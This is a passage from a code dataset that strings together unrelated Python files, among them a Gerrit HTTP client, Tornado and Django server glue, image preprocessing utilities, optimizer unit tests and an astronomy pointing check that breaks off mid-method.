Mayer et al. (2018) suggest 2-4 for consumer grade cameras run1gspa = run1gsru.copy() run1gspa.label = "run1-gs-ru-pa" ReduceError_PA(run1gspa) # reprojection error - Mayer et al. 
(2018) suggest 0.3 to 0.5 run1gsre = run1gspa.copy() run1gsre.label = "run1-gs-ru-pa-re" ReduceError_RE(run1gsre) doc.save() # build dense cloud run1dc =run1gsre.copy() run1dc.label = "run1-dc" BuildDenseCloud(run1dc,DenseQual, DepthFilterMode) doc.save() # build mesh and texture #BuildModel(run1dc,SurfType,ModInterp, ModFaceCount,ModSource) #doc.save() else: print('invalid directory or file name')
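
# Illustrative, PhotoScan-independent sketch of the gradual-selection idea used
# in the ReduceError_* functions above: relax the threshold until removing the
# points above it would discard no more than a fixed fraction of the cloud.
# Names and defaults here are assumptions for illustration only.
# def relaxed_threshold(errors, init_threshold, max_fraction=0.5, step=1.0):
#     threshold = init_threshold
#     while sum(e > threshold for e in errors) >= len(errors) * max_fraction:
#         threshold += step
#     return threshold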
StarcoderdataPython
1750451
<reponame>sstoefe/python-gerrit-api #!/usr/bin/env python # -*- coding:utf-8 -*- # @Author: <NAME> from requests import Session from requests.adapters import HTTPAdapter from gerrit.utils.exceptions import ( NotAllowedError, ValidationError, AuthError, UnauthorizedError, NotFoundError, ConflictError, ClientError, ServerError, ) class Requester(object): """ A class which carries out HTTP requests. You can replace this class with one of your own implementation if you require some other way to access Gerrit. This default class can handle simple authentication only. """ VALID_STATUS_CODES = [ 200, ] AUTH_COOKIE = None def __init__(self, **kwargs): """ :param kwargs: """ timeout = 10 self.username = kwargs.get("username") self.password = <PASSWORD>("password") self.ssl_verify = kwargs.get("ssl_verify") self.cert = kwargs.get("cert") self.timeout = kwargs.get("timeout", timeout) self.session = Session() self.max_retries = kwargs.get("max_retries") if self.max_retries is not None: retry_adapter = HTTPAdapter(max_retries=self.max_retries) self.session.mount("http://", retry_adapter) self.session.mount("https://", retry_adapter) def get_request_dict( self, params=None, data=None, json=None, headers=None, **kwargs ): """ :param params: :param data: :param json: :param headers: :param kwargs: :return: """ request_kwargs = kwargs if self.username and self.password: request_kwargs["auth"] = (self.username, self.password) if params: assert isinstance(params, dict), "Params must be a dict, got %s" % repr( params ) request_kwargs["params"] = params if headers: assert isinstance(headers, dict), "headers must be a dict, got %s" % repr( headers ) request_kwargs["headers"] = headers if self.AUTH_COOKIE: currentheaders = request_kwargs.get("headers", {}) currentheaders.update({"Cookie": self.AUTH_COOKIE}) request_kwargs["headers"] = currentheaders request_kwargs["verify"] = self.ssl_verify request_kwargs["cert"] = self.cert if data and json: raise ValueError("Cannot use data and json together") if data: request_kwargs["data"] = data if json: request_kwargs["json"] = json request_kwargs["timeout"] = self.timeout return request_kwargs def get( self, url, params=None, headers=None, allow_redirects=True, stream=False, **kwargs ): """ :param url: :param params: :param headers: :param allow_redirects: :param stream: :param kwargs: :return: """ request_kwargs = self.get_request_dict( params=params, headers=headers, allow_redirects=allow_redirects, stream=stream, **kwargs ) return self.confirm_status(self.session.get(url, **request_kwargs)) def post( self, url, params=None, data=None, json=None, files=None, headers=None, allow_redirects=True, **kwargs ): """ :param url: :param params: :param data: :param json: :param files: :param headers: :param allow_redirects: :param kwargs: :return: """ request_kwargs = self.get_request_dict( params=params, data=data, json=json, files=files, headers=headers, allow_redirects=allow_redirects, **kwargs ) return self.confirm_status(self.session.post(url, **request_kwargs)) def put( self, url, params=None, data=None, json=None, files=None, headers=None, allow_redirects=True, **kwargs ): """ :param url: :param params: :param data: :param json: :param files: :param headers: :param allow_redirects: :param kwargs: :return: """ request_kwargs = self.get_request_dict( params=params, data=data, json=json, files=files, headers=headers, allow_redirects=allow_redirects, **kwargs ) return self.confirm_status(self.session.put(url, **request_kwargs)) def delete(self, url, headers=None, 
allow_redirects=True, **kwargs): """ :param url: :param headers: :param allow_redirects: :param kwargs: :return: """ request_kwargs = self.get_request_dict( headers=headers, allow_redirects=allow_redirects, **kwargs ) return self.confirm_status(self.session.delete(url, **request_kwargs)) @staticmethod def confirm_status(res): """ check response status code :param res: :return: """ http_error_msg = "" if isinstance(res.reason, bytes): # We attempt to decode utf-8 first because some servers # choose to localize their reason strings. If the string # isn't utf-8, we fall back to iso-8859-1 for all other # encodings. (See PR #3538) try: reason = res.reason.decode("utf-8") except UnicodeDecodeError: reason = res.reason.decode("iso-8859-1") else: reason = res.reason if 400 <= res.status_code < 500: http_error_msg = u"%s Client Error: %s for url: %s" % ( res.status_code, reason, res.url, ) elif 500 <= res.status_code < 600: http_error_msg = u"%s Server Error: %s for url: %s" % ( res.status_code, reason, res.url, ) if res.status_code < 300: # OK, return http response return res elif res.status_code == 400: # Validation error raise ValidationError(http_error_msg) elif res.status_code == 401: # Unauthorized error raise UnauthorizedError(http_error_msg) elif res.status_code == 403: # Auth error raise AuthError(http_error_msg) elif res.status_code == 404: # Not Found raise NotFoundError(http_error_msg) elif res.status_code == 405: # Method Not Allowed raise NotAllowedError(http_error_msg) elif res.status_code == 409: # Conflict raise ConflictError(http_error_msg) elif res.status_code < 500: # Other 4xx, generic client error raise ClientError(http_error_msg) else: # 5xx is server error raise ServerError(http_error_msg)
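
# Usage sketch (host and credentials are placeholders, not from this project):
# requester = Requester(username="admin", password="secret", ssl_verify=True)
# response = requester.get("https://gerrit.example.com/a/projects/")
# confirm_status() has already vetted the HTTP status, so for JSON endpoints the
# body can be decoded directly (after stripping Gerrit's magic )]}' prefix).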
StarcoderdataPython
4814030
from typing import Dict import attr @attr.s class NaiveBayesClassifierFreqs: """Naive Bayes classification table frequency values entry NaiveBayesClassifierFreqs contains the frequency values for whether a particular domain is found in viral, plasmid or chromosomal sequence.""" name: str = attr.ib() plasmid_freq: float = attr.ib() chrom_freq: float = attr.ib() viral_freq: float = attr.ib() plasmid_or_chrom_freq: float = attr.ib() @classmethod def from_line(cls, line): name, _, _, _, plasmid_freq, chrom_freq, viral_freq, plasmid_or_chrom_freq = line.strip().split('\t') return cls(name=name, plasmid_freq=float(plasmid_freq), chrom_freq=float(chrom_freq), viral_freq=float(viral_freq), plasmid_or_chrom_freq=float(plasmid_or_chrom_freq)) def parse_naive_bayes_classifier_table(path) -> Dict[str, NaiveBayesClassifierFreqs]: out = {} with open(path) as f: for line in f: freqs = NaiveBayesClassifierFreqs.from_line(line) out[freqs.name] = freqs return out
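
# Usage sketch with a made-up tab-separated line; from_line() expects exactly
# eight columns, of which columns 2-4 are ignored.
# line = "PF00001\tx\ty\tz\t0.10\t0.60\t0.25\t0.70\n"
# freqs = NaiveBayesClassifierFreqs.from_line(line)
# assert freqs.viral_freq == 0.25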
StarcoderdataPython
69473
<reponame>aleksandromelo/Exercicios cont = ('zero', 'um', 'dois', 'três', 'quatro', 'cinco', 'seis', 'sete', 'oito', 'nove', 'dez') n = int(input('Digite um número entre 0 e 10: ')) print(f'Você digitou o número {cont[n]}.')
StarcoderdataPython
1614296
<filename>projectenv/lib/python2.7/site-packages/gulp/__init__.py # -*- coding: utf-8 -*- from functools import wraps import logging import time as t __author__ = '<NAME>' __email__ = '<EMAIL>' __version__ = '0.1.0' def debug_log(lvl=logging.DEBUG, logger_name=None): def enable(f): logger = logging.getLogger(logger_name) @wraps(f) def wrapper(*args, **kwargs): init = logger.getEffectiveLevel() logger.setLevel(lvl) print('\n# function: {}'.format(f.__name__)) y = f(*args, **kwargs) logger.setLevel(init) return y return wrapper return enable def time_this(fmt, multiplier=1, **print_kwargs): def enable(f): @wraps(f) def wrapper(*args, **kwargs): start_t = t.time() y = f(*args, **kwargs) end_t = t.time() print('\n# function: {}'.format(f.__name__)) print(fmt.format(multiplier * (end_t-start_t)), **print_kwargs) return y return wrapper return enable def peek_vars(): def enable(f): @wraps(f) def wrapper(*args, **kwargs): y = f(*args, **kwargs) print('\n# function: {}'.format(f.__name__)) print('args: {}'.format(str(args))) print('kwargs: {}'.format(str(kwargs))) print('return: {}'.format(str(y))) return y return wrapper return enable
StarcoderdataPython
4823454
from logging import Logger from typing import Optional from pluggy import PluginManager from preacher.compilation.request import create_request_compiler from preacher.compilation.verification import create_description_compiler from preacher.compilation.verification import create_predicate_compiler from preacher.compilation.verification import create_response_description_compiler from .case import CaseCompiler from .scenario import ScenarioCompiler def create_scenario_compiler( plugin_manager: Optional[PluginManager] = None, logger: Optional[Logger] = None, ) -> ScenarioCompiler: request = create_request_compiler() predicate = create_predicate_compiler(plugin_manager=plugin_manager, logger=logger) description = create_description_compiler( predicate=predicate, plugin_manager=plugin_manager, logger=logger, ) response = create_response_description_compiler( predicate=predicate, description=description, logger=logger, ) case = CaseCompiler(request=request, response=response, description=description) return ScenarioCompiler(description=description, case=case)
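
# Usage sketch: both arguments are optional, so the default wiring is simply
# compiler = create_scenario_compiler()
# A plugin-aware variant would pass plugin_manager and logger explicitly.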
StarcoderdataPython
1609821
##Create principal and thickened contours=name ##digitalterrainmodelraster=raster ##vzorec=stringif(("ELEV" % 25)=0,1,0) ##contourinterval=number5.0 ##contours=output vector outputs_GDALOGRCONTOUR_1=processing.runalg('gdalogr:contour', digitalterrainmodelraster,contourinterval,'ELEV',None,None) outputs_QGISFIELDCALCULATOR_2=processing.runalg('qgis:fieldcalculator', outputs_GDALOGRCONTOUR_1['OUTPUT_VECTOR'],'thick',1,1.0,0.0,True,vzorec,contours)
StarcoderdataPython
1752090
from ipywidgets import Output from IPython.display import display, HTML class AboutTab(object): def __init__(self): # self.tab = Output(layout={'height': '600px'}) self.tab = Output(layout={'height': 'auto'}) self.tab.append_display_data(HTML(filename='doc/about.html'))
StarcoderdataPython
3398135
<gh_stars>0 # Thanks to <NAME> for his file which show us # how to make Tornado runs fine with Django and other WSGI Handler. # => https://github.com/bdarnell/django-tornado-demo/blob/master/testsite/tornado_main.py import json import django.core.handlers.wsgi from django.apps import AppConfig from django.conf import settings from django.core.management import BaseCommand from tornado_websockets.tornadowrapper import TornadoWrapper if django.VERSION[1] > 5: django.setup() DEFAULT_PORT = 8000 def get_port(options, configuration): port = options.get('port') port = port or configuration.get('port') port = port or DEFAULT_PORT return port def run(tornado_handlers, tornado_settings, port): TornadoWrapper.start_app(tornado_handlers, tornado_settings) TornadoWrapper.listen(port) TornadoWrapper.loop() class Command(BaseCommand, AppConfig): help = 'Run Tornado web server with Django and WebSockets support' def __init__(self, *args, **kwargs): super(Command, self).__init__(*args, **kwargs) def add_arguments(self, parser): parser.add_argument('port', nargs='?', help='Optional port number', type=int) def handle(self, *args, **options): try: configuration = settings.TORNADO except AttributeError as e: self.stderr.write('runtornado: Configuration => Not found: %s.' % e) return port = get_port(options, configuration) tornado_handlers = configuration.get('handlers', []) tornado_settings = configuration.get('settings', {}) self.stdout.write('runtornado: Configuration => Found.') self.stdout.write('runtornado: Port => %d.' % port) self.stdout.write('runtornado: Handlers => Found %d initial handlers.' % len(tornado_handlers)) self.stdout.write('runtornado: Settings => ' + json.dumps(tornado_settings)) run(tornado_handlers, tornado_settings, port)
StarcoderdataPython
3219675
<gh_stars>1-10 """Provide API for transaction model scheme.""" import sqlalchemy from complainer.db import metadata transaction = sqlalchemy.Table( 'transactions', metadata, sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True), sqlalchemy.Column('quote_id', sqlalchemy.String(120), nullable=False), sqlalchemy.Column('transfer_id', sqlalchemy.Integer, nullable=False), sqlalchemy.Column( 'target_account_id', sqlalchemy.String(120), nullable=False ), sqlalchemy.Column('amount', sqlalchemy.Float, nullable=False), sqlalchemy.Column( 'complaint_id', sqlalchemy.ForeignKey('complaints.id'), nullable=False ), )
StarcoderdataPython
179412
#import sys, os #from importlib import import_module from fast_calc import rbp def run(a,b): return rbp(a, b) def fcn2( a ): a.id = a.id2 return a
StarcoderdataPython
1657065
<filename>setup.py from setuptools import setup setup( use_scm_version=True, setup_requires=["setuptools_scm"], entry_points={"console_scripts": ["rexpy = rexpy.__main__:cli"]} )
StarcoderdataPython
1777072
from django.db import models from django.utils.timezone import now import datetime from django.contrib.auth.models import Permission from django.contrib.contenttypes.models import ContentType from esmond.util import datetime_to_unixtime, remove_metachars, max_datetime, atencode class DeviceTag(models.Model): """A tag for a :py:class:`.Device.`""" name = models.CharField(max_length = 256, unique=True) class Meta: db_table = "devicetag" def __unicode__(self): return self.name class DeviceManager(models.Manager): def active(self): qs = super(DeviceManager, self).get_query_set() qs = qs.filter(active=True, end_time__gt=now()) return qs def active_as_dict(self): d = {} for dev in self.active(): d[dev.name] = dev return d class Device(models.Model): """A system which is pollable via SNMP. Referred to as a Managed Device in SNMP terminology. """ name = models.CharField(max_length = 256) begin_time = models.DateTimeField() end_time = models.DateTimeField(default=max_datetime) community = models.CharField(max_length = 128) active = models.BooleanField(default = True) devicetag = models.ManyToManyField(DeviceTag, through = "DeviceTagMap") oidsets = models.ManyToManyField("OIDSet", through = "DeviceOIDSetMap") objects = DeviceManager() class Meta: db_table = "device" ordering = ['name'] def __unicode__(self): return self.name def to_dict(self): return dict( begin_time=datetime_to_unixtime(self.begin_time), end_time=datetime_to_unixtime(self.end_time), name=self.name, active=self.active) class DeviceTagMap(models.Model): """Associates a set of :py:class:`.DeviceTag`s with a :py:class:`.Device`""" device = models.ForeignKey(Device, db_column="deviceid") device_tag = models.ForeignKey(DeviceTag, db_column="devicetagid") class Meta: db_table = "devicetagmap" class OIDType(models.Model): """Defines the type for an :py:class:`.OID`""" name = models.CharField(max_length=256) class Meta: db_table = "oidtype" ordering = ["name"] def __unicode__(self): return self.name class Poller(models.Model): """Defines a Poller that can be used to collect data.""" name = models.CharField(max_length=256) class Meta: db_table = "poller" ordering = ["name"] def __unicode__(self): return self.name class OID(models.Model): """An Object Identifier. This is a variable that can be measured via SNMP. 
""" name = models.CharField(max_length=256) aggregate = models.BooleanField(default = False) oid_type = models.ForeignKey(OIDType,db_column = "oidtypeid") endpoint_alias = models.CharField(max_length=256, null=True, blank=True, help_text="Optional endpoint alias (in, out, discard/out, etc)") class Meta: db_table = "oid" ordering = ["name"] def __unicode__(self): return self.name class OIDSet(models.Model): """A collection of :py:class:`.OID`s that are collected together.""" name = models.CharField(max_length=256, help_text="Name for OIDSet.") frequency = models.IntegerField(help_text="Polling frequency in seconds.") poller = models.ForeignKey(Poller,db_column="pollerid", help_text="Which poller to use for this OIDSet") poller_args = models.CharField(max_length=256, null=True, blank=True, help_text="Arguments for the Poller") oids = models.ManyToManyField(OID, through = "OIDSetMember", help_text="List of OIDs in the OIDSet") class Meta: db_table = "oidset" ordering = ["name"] def __unicode__(self): return self.name @property def aggregates(self): aggs = [] if self.poller_args: for i in self.poller_args.split(" "): k,v = i.split("=") if k == "aggregates": aggs = map(int, v.split(",")) break return aggs @property def ttl(self): ttl = None if self.poller_args: for i in self.poller_args.split(" "): k,v = i.split("=") if k == "ttl": ttl = int(v) break return ttl @property def frequency_ms(self): return self.frequency * 1000 @property def set_name(self): set_name = self.name if self.poller_args: for i in self.poller_args.split(" "): k, v = i.split("=") if k == "set_name": set_name = v break return set_name class OIDSetMember(models.Model): """Associate :py:class:`.OID`s with :py:class:`.OIDSets`""" oid = models.ForeignKey(OID,db_column="oidid") oid_set = models.ForeignKey(OIDSet,db_column="oidsetid") class Meta: db_table = "oidsetmember" ordering = ["oid_set", "oid"] class DeviceOIDSetMap(models.Model): """Associate :py:class:`.OIDSet`s with :py:class:`.Device`s""" device = models.ForeignKey(Device,db_column="deviceid") oid_set = models.ForeignKey(OIDSet,db_column="oidsetid") class Meta: db_table = "deviceoidsetmap" ordering = ["device", "oid_set"] class IfRefManager(models.Manager): def active(self): qs = super(IfRefManager, self).get_query_set() qs = qs.filter(end_time__gt=now()) return qs class IfRef(models.Model): """Interface metadata. Data is stored with a begin_time and end_time. A new row is only created when one or more columns change. This provides a historical view of the interface metadata. 
""" device = models.ForeignKey(Device, db_column="deviceid") ifIndex = models.IntegerField(db_column="ifindex") ifDescr = models.CharField(max_length=512, db_column="ifdescr") ifAlias = models.CharField(max_length=512, db_column="ifalias", blank=True, null=True) ipAddr = models.IPAddressField(blank=True, db_column="ipaddr", null=True) ifSpeed = models.BigIntegerField(db_column="ifspeed", blank=True, null=True) ifHighSpeed = models.BigIntegerField(db_column="ifhighspeed", blank=True, null=True) ifMtu = models.IntegerField(db_column="ifmtu", blank=True, null=True) ifType = models.IntegerField(db_column="iftype", blank=True, null=True) ifOperStatus = models.IntegerField(db_column="ifoperstatus", blank=True, null=True) ifAdminStatus = models.IntegerField(db_column="ifadminstatus", blank=True, null=True) begin_time = models.DateTimeField() end_time = models.DateTimeField(default=max_datetime) ifPhysAddress = models.CharField(max_length=32, db_column="ifphysaddress", blank=True, null=True) objects = IfRefManager() class Meta: db_table = "ifref" ordering = ["device__name", "ifDescr"] permissions = ( ("can_see_hidden_ifref", "Can see IfRefs with ifAlias containing :hide:"), ) def __unicode__(self): return "%s (%s) %s"%(self.ifDescr, self.ifIndex, self.ifAlias) def encoded_ifDescr(self): return atencode(self.ifDescr) def to_dict(self): if not self.ifHighSpeed or self.ifHighSpeed == 0: speed = self.ifSpeed else: speed = self.ifHighSpeed * int(1e6) return dict(name=self.ifDescr, descr=self.ifAlias, speed=speed, begin_time=datetime_to_unixtime(self.begin_time), end_time=datetime_to_unixtime(self.end_time), device=self.device.name, ifIndex=self.ifIndex, ifDescr=self.ifDescr, ifAlias=self.ifAlias, ifSpeed=self.ifSpeed, ifHighSpeed=self.ifHighSpeed, ipAddr=self.ipAddr) class ALUSAPRefManager(models.Manager): def active(self): qs = super(ALUSAPRefManager, self).get_query_set() qs = qs.filter(end_time__gt=now()) return qs class ALUSAPRef(models.Model): """Metadata about ALU SAPs.""" device = models.ForeignKey(Device, db_column="deviceid") name = models.CharField(max_length=128) sapDescription = models.CharField(max_length=512, db_column="sapdescription") sapIngressQosPolicyId = models.IntegerField( db_column="sapingressqospolicyid") sapEgressQosPolicyId = models.IntegerField( db_column="sapegressqospolicyid") begin_time = models.DateTimeField() end_time = models.DateTimeField(default=max_datetime) objects = ALUSAPRefManager() class Meta: db_table = "alusapref" ordering = ["device__name", "name"] def __unicode__(self): return "%s %s" % (self.device, self.name) def to_dict(self): return dict(name=self.name, device=self.device.name, sapDescription=self.sapDescription, sapEgressQosPolicyId=self.sapEgressQosPolicyId, sapIngressQosPolicyId=self.sapIngressQosPolicyId, end_time=datetime_to_unixtime(self.end_time), begin_time=datetime_to_unixtime(self.begin_time)) class HistoryTableManager(models.Manager): def active(self): qs = super(HistoryTableManager, self).get_query_set() qs = qs.filter(end_time__gt=now()) return qs class OutletRef(models.Model): device = models.ForeignKey(Device, db_column="deviceid") outletID = models.CharField(max_length=128) outletName = models.CharField(max_length=128) outletStatus = models.IntegerField() outletControlState = models.IntegerField(blank=True, null=True) begin_time = models.DateTimeField() end_time = models.DateTimeField(default=max_datetime) objects = HistoryTableManager() class Meta: db_table = "outletref" ordering = ["device__name", "outletID"] def __unicode__(self): 
return "%s %s: %s" % (self.device, self.outletID, self.outletName) def to_dict(self): return dict(device=self.device.name, outletID=self.outletID, outletName=self.outletName, outletStatus=self.outletStatus, outletControlState=self.outletControlState) class LSPOpStatus(models.Model): """Metadata about MPLS LSPs.""" device = models.ForeignKey(Device, db_column="deviceid") name = models.CharField(max_length=128) srcAddr = models.IPAddressField() dstAddr = models.IPAddressField() state = models.IntegerField() begin_time = models.DateTimeField() end_time = models.DateTimeField(default=max_datetime) class Meta: db_table = "lspopstatus" ordering = ["device__name", "name"] def __unicode__(self): return "%s %s" % (self.device, self.name) class APIPermissionManager(models.Manager): def get_query_set(self): return super(APIPermissionManager, self).\ get_query_set().filter(content_type__name='api_permission') class APIPermission(Permission): """A global permission, not attached to a model""" objects = APIPermissionManager() class Meta: proxy = True permissions = ( ("esmond_api.view_timeseries", "View timseries data"), ("esmond_api.add_timeseries", "Add timseries data"), ("esmond_api.delete_timeseries", "Delete timseries data"), ("esmond_api.change_timeseries", "Change timseries data"), ) def save(self, *args, **kwargs): ct, created = ContentType.objects.get_or_create( name="api_permission", app_label=self._meta.app_label ) self.content_type = ct super(APIPermission, self).save(*args, **kwargs) ### Models for data inventory class Inventory(models.Model): """Data inventory to drive gap scanning""" # choices for cf to scan RAW_DATA = 'RD' BASE_RATES = 'BR' RATE_AGGS = 'RA' STAT_AGGS = 'SA' COLUMN_FAMILY_CHOICES = ( (RAW_DATA, 'raw_data'), (BASE_RATES, 'base_rates'), (RATE_AGGS, 'rate_aggregations'), (STAT_AGGS, 'stat_aggregations') ) # fields row_key = models.CharField(max_length=128, unique=True) start_time = models.DateTimeField() end_time = models.DateTimeField() last_scan_point = models.DateTimeField(null=True, blank=True) scan_complete = models.BooleanField(default=False) column_family = models.CharField(max_length=2, choices=COLUMN_FAMILY_CHOICES, default=BASE_RATES) class Meta: db_table = 'inventory' ordering = ['row_key'] def __unicode__(self): return self.row_key def to_dict(self): return dict( row_key=self.row_key, last_scan_point=self.last_scan_point, scan_complete=self.scan_complete ) class GapInventory(models.Model): """Inventory of gaps existing in the data""" row = models.ForeignKey(Inventory, db_column='keyid') start_time = models.DateTimeField() end_time = models.DateTimeField() processed = models.BooleanField(default=False) class Meta: db_table = 'gap_inventory' ordering = ['row__row_key'] def __unicode__(self): return self.row.row_key def to_dict(self): return dict( row=self.row.row_key, processed=self.processed )
StarcoderdataPython
3234897
import argparse import os from guacamol.assess_distribution_learning import assess_distribution_learning from guacamol.utils.helpers import setup_default_logger from .generator import RandomSmilesSampler if __name__ == "__main__": setup_default_logger() parser = argparse.ArgumentParser( description="Molecule distribution learning benchmark for random smiles sampler", formatter_class=argparse.ArgumentDefaultsHelpFormatter, ) parser.add_argument("--dist_file", default="data/guacamol_v1_all.smiles") parser.add_argument("--output_dir", default=None, help="Output directory") parser.add_argument("--suite", default="v2") args = parser.parse_args() if args.output_dir is None: args.output_dir = os.path.dirname(os.path.realpath(__file__)) with open(args.dist_file, "r") as smiles_file: smiles_list = [line.strip() for line in smiles_file.readlines()] generator = RandomSmilesSampler(molecules=smiles_list) json_file_path = os.path.join(args.output_dir, "distribution_learning_results.json") assess_distribution_learning( generator, chembl_training_file=args.dist_file, json_output_file=json_file_path, benchmark_version=args.suite, )
StarcoderdataPython
134230
# -*- coding: utf-8 -*- from ._compat import FileNotFoundError class TimezoneNotFound(FileNotFoundError): pass
StarcoderdataPython
3388868
# flake8: noqa from .loader import Loader
StarcoderdataPython
1772287
<reponame>chunzhang-hub/PaddleHub # coding=utf-8 import os import time from collections import OrderedDict import cv2 import numpy as np from ace2p.processor import get_direction, get_3rd_point, get_affine_transform __all__ = ['reader'] def _box2cs(box, aspect_ratio): x, y, w, h = box[:4] return _xywh2cs(x, y, w, h, aspect_ratio) def _xywh2cs(x, y, w, h, aspect_ratio, pixel_std=200): center = np.zeros((2), dtype=np.float32) center[0] = x + w * 0.5 center[1] = y + h * 0.5 if w > aspect_ratio * h: h = w * 1.0 / aspect_ratio elif w < aspect_ratio * h: w = h * aspect_ratio scale = np.array([w * 1.0 / pixel_std, h * 1.0 / pixel_std], dtype=np.float32) return center, scale def preprocess(org_im, scale, rotation): image = org_im.copy() image_height, image_width, _ = image.shape aspect_ratio = scale[1] * 1.0 / scale[0] image_center, image_scale = _box2cs([0, 0, image_width - 1, image_height - 1], aspect_ratio) trans = get_affine_transform(image_center, image_scale, rotation, scale) image = cv2.warpAffine( image, trans, (int(scale[1]), int(scale[0])), flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT, borderValue=(0, 0, 0)) img_mean = np.array([0.406, 0.456, 0.485]).reshape((1, 1, 3)) img_std = np.array([0.225, 0.224, 0.229]).reshape((1, 1, 3)) image = image.astype(np.float) image = (image / 255.0 - img_mean) / img_std image = image.transpose(2, 0, 1).astype(np.float32) image_info = { 'image_center': image_center, 'image_height': image_height, 'image_width': image_width, 'image_scale': image_scale, 'rotation': rotation, 'scale': scale } return image, image_info def reader(images, paths, scale, rotation): """ Preprocess to yield image. Args: images (list(numpy.ndarray)): images data, shape of each is [H, W, C] paths (list[str]): paths to images. scale (tuple): size of preprocessed image. rotation (int): rotation angle, used for obtaining affine matrix in preprocess. Yield: element (collections.OrderedDict): info of original image and preprocessed image. """ component = list() if paths: for im_path in paths: each = OrderedDict() assert os.path.isfile(im_path), "The {} isn't a valid file path.".format(im_path) im = cv2.imread(im_path) each['org_im'] = im each['org_im_path'] = im_path component.append(each) if images is not None: assert type(images) is list, "images should be a list." for im in images: each = OrderedDict() each['org_im'] = im each['org_im_path'] = 'ndarray_time={}.jpg'.format(round(time.time(), 6) * 1e6) component.append(each) for element in component: element['image'], element['image_info'] = preprocess(element['org_im'], scale, rotation) yield element
StarcoderdataPython
3373902
import cv2 def pixel_diff(path1, path2): image1 = cv2.imread(path1) image2 = cv2.imread(path2) image1 = cv2.resize(image1, None, fx=.5, fy=.5) image2 = cv2.resize(image2, None, fx=.5, fy=.5) difference = cv2.subtract(image1, image2) # difference = cv2.resize(difference, None, fx=.5, fy=.5) cv2.imshow("difference", difference) cv2.waitKey() cv2.destroyAllWindows()
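
# Usage sketch (file names are placeholders); both inputs should share the same
# dimensions, since cv2.subtract requires same-shaped arrays after the resize.
# pixel_diff('before.png', 'after.png')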
StarcoderdataPython
11895
import jax import elegy import unittest import numpy as np import jax.numpy as jnp import optax class MLP(elegy.Module): """Standard LeNet-300-100 MLP network.""" n1: int n2: int def __init__(self, n1: int = 3, n2: int = 4): super().__init__() self.n1 = n1 self.n2 = n2 def call(self, image: jnp.ndarray, training: bool): x = image.astype(jnp.float32) / 255.0 x = jnp.reshape(x, [x.shape[0], -1]) x = elegy.nn.Linear(self.n1)(x) x = elegy.nn.BatchNormalization()(x) x = jax.nn.relu(x) x = elegy.nn.Linear(self.n2)(x) x = jax.nn.relu(x) x = elegy.nn.Linear(10)(x) return x class OptimizerTest(unittest.TestCase): def test_optimizer(self): optax_op = optax.adam(1e-3) lr_schedule = lambda step, epoch: step / 3 optimizer = elegy.Optimizer(optax_op, lr_schedule=lr_schedule) params = np.random.uniform((3, 4)) grads = np.random.uniform((3, 4)) rng = elegy.RNGSeq(42) optimizer_states = optimizer.init(rng, params) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 2 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 3 / 3) def test_optimizer_epoch(self): optax_op = optax.adam(1e-3) lr_schedule = lambda step, epoch: epoch optimizer = elegy.Optimizer( optax_op, lr_schedule=lr_schedule, steps_per_epoch=2 ) params = np.random.uniform((3, 4)) grads = np.random.uniform((3, 4)) rng = elegy.RNGSeq(42) optimizer_states = optimizer.init( rng=rng, net_params=params, ) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) def test_optimizer_chain(self): optimizer = elegy.Optimizer( optax.sgd(0.1), optax.clip(0.5), ) params = np.zeros(shape=(3, 4)) grads = np.ones(shape=(3, 4)) * 100_000 rng = elegy.RNGSeq(42) optimizer_states = optimizer.init( rng=rng, net_params=params, ) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert np.all(-0.5 <= params) and np.all(params <= 0.5) def test_lr_logging(self): model = elegy.Model( module=MLP(n1=3, n2=1), loss=elegy.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=elegy.metrics.SparseCategoricalAccuracy(), optimizer=elegy.Optimizer( optax.adamw(1.0, b1=0.95), lr_schedule=lambda step, epoch: jnp.array(1e-3), ), run_eagerly=True, ) X = np.random.uniform(size=(5, 7, 7)) y = np.random.randint(10, size=(5,)) history = model.fit( x=X, y=y, epochs=1, steps_per_epoch=1, batch_size=5, validation_data=(X, y), shuffle=True, verbose=0, ) assert "lr" in history.history assert np.allclose(history.history["lr"], 1e-3)
StarcoderdataPython
3382779
from vkbottle.framework.bot import Bot from vkbottle.types.message import Message from vkbottle.framework.blueprint.bot import Blueprint
StarcoderdataPython
1733048
import os

import astropy.units as u
from astropy.coordinates import SkyCoord

from banzai.stages import Stage
from banzai import logs


class PointingTest(Stage):
    """
    A test to determine whether or not the pointing error on the frame
    (as determined by a WCS solve) is within tolerance.
    """
    # Typical pointing is within 5" of requested pointing (arcsec).
    WARNING_THRESHOLD = 30.0
    SEVERE_THRESHOLD = 300.0

    def __init__(self, pipeline_context):
        super(PointingTest, self).__init__(pipeline_context)

    @property
    def group_by_keywords(self):
        return None

    def setup_logging(self, image):
        self.logging_tags = logs.image_config_to_tags(image, self.group_by_keywords)
        logs.add_tag(self.logging_tags, 'filename', os.path.basename(image.filename))

    def do_stage(self, images):
        for image in images:
            self.setup_logging(image)

            try:
                # OFST-RA/DEC is the same as CAT-RA/DEC but includes user requested offset
                requested_coords = SkyCoord(image.header['OFST-RA'], image.header['OFST-DEC'],
                                            unit=(u.hour, u.deg), frame='icrs')
            except ValueError as e:
                try:
                    # Fallback to CAT-RA and CAT-DEC
                    requested_coords = SkyCoord(image.header['CAT-RA'], image.header['CAT-DEC'],
                                                unit=(u.hour, u.deg), frame='icrs')
                except Exception:
                    self.logger.error(e, extra=self.logging_tags)
                    continue

            # This only works assuming CRPIX is at the center of the image
